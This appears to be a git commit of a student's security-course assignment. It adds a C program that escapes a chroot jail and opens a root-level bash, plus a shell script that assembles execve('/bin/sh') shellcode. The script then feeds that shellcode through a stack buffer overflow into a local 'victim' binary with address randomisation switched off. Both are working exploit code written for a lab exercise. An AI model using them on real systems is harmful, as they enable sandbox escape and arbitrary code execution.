diff options
| author | Camil Staps | 2015-12-29 21:59:09 +0100 |
|---|---|---|
| committer | Camil Staps | 2015-12-29 21:59:09 +0100 |
| commit | 29d4f26127ef8f3925df8437b41c89e3093d3508 (patch) | |
| tree | b88d296e97e64dbbd4d66bd02214f3e7a6b55f41 | |
| parent | Fixed typo (diff) | |
Assignment 6
| -rw-r--r-- | CamilStaps-s4498062-Assignment-6/ex1 | 5 | ||||
| -rw-r--r-- | CamilStaps-s4498062-Assignment-6/ex1.c | 23 | ||||
| -rw-r--r-- | CamilStaps-s4498062-Assignment-6/ex2 | 4 | ||||
| -rwxr-xr-x | CamilStaps-s4498062-Assignment-6/ex2.sh | 15 |
4 files changed, 47 insertions, 0 deletions
diff --git a/CamilStaps-s4498062-Assignment-6/ex1 b/CamilStaps-s4498062-Assignment-6/ex1 new file mode 100644 index 0000000..7e92286 --- /dev/null +++ b/CamilStaps-s4498062-Assignment-6/ex1 @@ -0,0 +1,5 @@ +a No: 'too many levels of symbolic links' +b idem +c See ex1.c +d No, 'bash: /root/.bashrc: Permission denied' + diff --git a/CamilStaps-s4498062-Assignment-6/ex1.c b/CamilStaps-s4498062-Assignment-6/ex1.c new file mode 100644 index 0000000..0ce1505 --- /dev/null +++ b/CamilStaps-s4498062-Assignment-6/ex1.c @@ -0,0 +1,23 @@ +#include <fcntl.h> +#include <stdio.h> + +int main(void) { + int cwdf, x; + + mkdir("crowbardir", 0755); + + cwdf = open(".", O_RDONLY); + + chroot("crowbardir"); + + fchdir(cwdf); + close(cwdf); + + for (x=0; x<1024; x++) + chdir(".."); + + chroot("."); + + system("/bin/bash"); +} + diff --git a/CamilStaps-s4498062-Assignment-6/ex2 b/CamilStaps-s4498062-Assignment-6/ex2 new file mode 100644 index 0000000..a542114 --- /dev/null +++ b/CamilStaps-s4498062-Assignment-6/ex2 @@ -0,0 +1,4 @@ +a This did not work on lilo because execstack is not installed on lilo. It worked on my local machine. + +I spent so much time on getting this to work on lilo that I didn't have time for b and c. + diff --git a/CamilStaps-s4498062-Assignment-6/ex2.sh b/CamilStaps-s4498062-Assignment-6/ex2.sh new file mode 100755 index 0000000..0a86bf5 --- /dev/null +++ b/CamilStaps-s4498062-Assignment-6/ex2.sh @@ -0,0 +1,15 @@ +echo 'int main() {\n asm("\\\nneedle0: jmp there\\n\\\nhere: pop %rdi\\n\\\n xor %rax, %rax\\n\\\n movb $0x3b, %al\\n\\\n xor %rsi, %rsi\\n\\\n xor %rdx, %rdx\\n\\\n syscall\\n\\\nthere: call here\\n\\\n.string \\"/bin/sh\\"\\n\\\nneedle1: .octa 0xdeadbeef\\n\\\n ");\n}' > shell.c +gcc shell.c + +start=`objdump -d a.out | grep '<needle0>:' | cut -f 1 -d ' '` +end=`objdump -d a.out | grep '<needle1>:' | cut -f 1 -d ' '` +start=$((0x$start-0x400000)) +end=$((0x$end-0x400000)) +l=$((end-start)) +while [ ! $((l % 32)) -eq 0 ]; do l=$((l+1)); done +xxd -s0x`printf %x $start` -l$l -p a.out shellcode + +a=$(echo "Camil" | setarch `arch` -R ./victim | head -n1) +a=$(printf %016x $a | tac -rs..) +( ( cat shellcode ; printf "%0464d" 0 ; echo $a ) | xxd -r -p ; cat ) | setarch `arch` -R ./victim + |